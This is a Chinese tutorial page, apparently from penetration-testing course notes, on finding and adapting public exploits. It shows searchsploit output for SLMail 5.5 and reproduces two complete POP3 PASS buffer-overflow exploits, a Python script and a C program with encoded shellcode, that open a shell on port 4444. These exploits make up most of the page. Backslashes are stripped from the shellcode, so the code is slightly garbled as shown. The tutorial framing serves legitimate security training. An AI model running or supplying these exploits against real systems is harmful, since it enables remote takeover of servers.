选择和修改EXP
网公开的EXP代码
选择可信赖的EXP源
Exploit-db
SecruityFocus
Searchsploit
有能力修改EXP(Python、Perl、Ruby、C、C++...)
www.securityfocus
选择和修改EXP
646.c
类unix坏境下编译
返回地址与我们的环境不符
反弹shell硬编码了回链IP地址
缓冲区偏移量与我们的环境不符
目标IP硬编码
root@kali:~# searchsploit slmail
--------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
--------------------------------------------- ----------------------------------
SLMail 5.5 - POP3 PASS Buffer Overflow Explo | ./windows/remote/638.py
SLMail 5.5 - POP3 PASS Remote Buffer Overflo | ./windows/remote/643.c
SLMail 5.5 - Remote Buffer Overflow Exploit | ./windows/remote/646.c
SLMail Pro 6.3.1.0 - Multiple Remote Denial | ./windows/
--------------------------------------------- ----------------------------------
root@kali:~# cp /usr/share/exploitdb/platforms/windows/remote/638.py .
root@kali:~# cp /usr/share/exploitdb/platforms/windows/remote/643.c .
root@kali:~# cp /usr/share/exploitdb/platforms/windows/remote/646.c .
root@kali:~# ls
638.py 643.c 646.c 公共 模板 视频 图片 文档 下载 音乐 桌面
╭────────────────────────────────────────────╮
[638.py]
########################################################## ## SLmail 5.5 POP3 PASS Buffer Overflow ## Discovered by : Muts ## Coded by : Muts ## www.offsec ## Plain vanilla stack overflow in the PASS command ## ########################################################### D:ProjectsBO>SLmail-5.5-POP3-PASS.py ########################################################### D:ProjectsBO>nc -v 192.168.1.167 4444 ## localhost.lan [192.168.1.167] 4444 (?) open # # Microsoft Windows 2000 [Version 5.00.2195] ## (C) Copyright 1985-2000 Microsoft Corp. ## C:Program FilesSLmailSystem> ##########################################################import structimport socketprint "nn###############################################"print "nSLmail 5.5 POP3 PASS Buffer Overflow"print "nFound & coded by muts [at] offsec"print "nFor Educational Purposes Only!" print "nn###############################################"s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sc = "xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xe0x66"sc += "x1cxc2x83xebxfcxe2xf4x1cx8ex4axc2xe0x66x4fx97xb6"sc += "x31x97xaexc4x7ex97x87xdcxedx48xc7x98x67xf6x49xaa"sc += "x7ex97x98xc0x67xf7x21xd2x2fx97xf6x6bx67xf2xf3x1f"sc += "x9ax2dx02x4cx5exfcxb6xe7xa7xd3xcfxe1xa1xf7x30xdb"sc += "x1ax38xd6x95x87x97x98xc4x67xf7xa4x6bx6ax57x49xba"sc += "x7ax1dx29x6bx62x97xc3x08x8dx1exf3x20x39x42x9fxbb"sc += "xa4x14xc2xbex0cx2cx9bx84xedx05x49xbbx6ax97x99xfc"sc += "xedx07x49xbbx6ex4fxaax6ex28x12x2ex1fxb0x95x05x61"sc += "x8ax1cxc3xe0x66x4bx94xb3xefxf9x2axc7x66x1cxc2x70"sc += "x67x1cxc2x56x7fx04x25x44x7fx6cx2bx05x2fx9ax8bx44"sc += "x7cx6cx05x44xcbx32x2bx39x6fxe9x6fx2bx8bxe0xf9xb7"sc += "x35x2ex9dxd3x54x1cx99x6dx2dx3cx93x1fxb1x95x1dx69"sc += "xa5x91xb7xf4x0cx1bx9bxb1x35xe3xf6x6fx99x49xc6xb9"sc += "xefx18x4cx02x94x37xe5xb4x99x2bx3dxb5x56x2dx02xb0"sc += "x36x4cx92xa0x36x5cx92x1fx33x30x4bx27x57xc7x91xb3"sc += "x0ex1exc2xf1x3ax95x22x8ax76x4cx95x1fx33x38x91xb7"sc += "x99x49xeaxb3x32x4bx3dxb5x46x95x05x88x25x51x86xe0"sc += "xefxffx45x1ax57xdcx4fx9cx42xb0xa8xf5x3fxefx69x67"sc += "x9cx9fx2exb4xa0x58xe6xf0x22x7ax05xa4x42x20xc3xe1"sc += "xefx60xe6xa8xefx60xe6xacxefx60xe6xb0xebx58xe6xf0"sc += "x32x4cx93xb1x37x5dx93xa9x37x4dx91xb1x99x69xc2x88"sc += "x14xe2x71xf6x99x49xc6x1fxb6x95x24x1fx13x1cxaax4d"sc += "xbfx19x0cx1fx33x18x4bx23x0cxe3x3dxd6x99xcfx3dx95"sc += "x66x74x32x6ax62x43x3dxb5x62x2dx19xb3x99xccxc2"#Tested on Win2k SP4 Unpatched# Change ret address if neededbuffer = 'x41' * 4654 + struct.pack('<L', 0x783d6ddf) + 'x90'*32 + sc try:print "nSending " s.connect(('192.168.1.167',110))data = s.recv(1024) s.send('USER username' +'rn')data = s.recv(1024) s.send('PASS ' + buffer + 'rn')data = s.recv(1024) s.close()print "nDone! Try connecting to port 4444 on victim machine."except:print "Could not connect to POP3!"# milw0rm [2004-11-18]
╰────────────────────────────────────────────╯
╭────────────────────────────────────────────╮
[646.c]
/*SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov Иван-дуракнедействительный 31337 Team*/#include <string.h>#include <stdio.h>#include <winsock2.h>#include <windows.h>// [*] bind 4444 unsigned char shellcode[] = "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45""x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49""x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d""x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66""x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61""xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40""x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32""x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6""x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09""xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0""x66x68x11x5cx66x53x89xe1x95x68xa4x1ax70xc7x57xff""xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53""x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff""xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64""x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89""xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab""xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51""x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53""xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6""x52xffxd0x68xf0x8ax04x5fx53xffxd6xffxd0";void exploit(int sock) { FILE *test; int *ptr; char userbuf[] = "USER madivanrn"; char evil[3001]; char buf[3012]; char receive[1024]; char nopsled[] = "x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90"; memset(buf, 0x00, 3012); memset(evil, 0x00, 3001); memset(evil, 0x43, 3000); ptr = &evil; ptr = ptr + 652; // 2608 memcpy(ptr, &nopsled, 16); ptr = ptr + 4; memcpy(ptr, &shellcode, 317); *(long*)&evil[2600] = 0x7CB41010; // JMP ESP XP 7CB41020 FFE4 JMP ESP // banner recv(sock, receive, 200, 0); printf("[+] %s", receive); // user printf("[+] n"); send(sock, userbuf, strlen(userbuf), 0); recv(sock, receive, 200, 0); printf("[+] %s", receive); // passwd printf("[+] Sending n"); sprintf(buf, "PASS %srn", evil); //test = fopen("", "w"); //fprintf(test, "%s", buf); //fclose(test); send(sock, buf, strlen(buf), 0); printf("[*] Done! Connect to the host on nn");}int connect_target(char *host, u_short port){ int sock = 0; struct hostent *hp; WSADATA wsa; struct sockaddr_in sa; WSAStartup(MAKEWORD(2,0), &wsa); memset(&sa, 0, sizeof(sa)); hp = gethostbyname(host); if (hp == NULL) { printf("gethostbyname() error!n"); exit(0); } printf("[+] Connecting to %sn", host); sa.sin_family = AF_INET; sa.sin_port = htons(port); sa.sin_addr = **((struct in_addr **) hp->h_addr_list); sock = socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) { printf("[-] socket blah?n"); exit(0); } if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) {printf("[-] connect() blah!n"); exit(0); } printf("[+] Connected to %sn", host); return sock;}int main(int argc, char **argv){ int sock = 0; int data, port; printf("n[$] SLMail Server POP3 PASSWD Buffer Overflow exploitn"); printf("[$] by Mad Ivan [ void31337 team ] - nn"); if ( argc < 2 ) { printf("usage: <host> nn"); exit(0); } port = 110; sock = connect_target(argv[1], port); exploit(sock); closesocket(sock); return 0;}
╰────────────────────────────────────────────╯
root@kali:~# gedit 638.py
root@kali:~# gedit 646.c
root@kali:~# gcc 646.c -0 646
选择和修改EXP
646.c
本文发布于:2024-01-28 03:15:13,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/17063829164386.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
| 留言与评论(共有 0 条评论) |
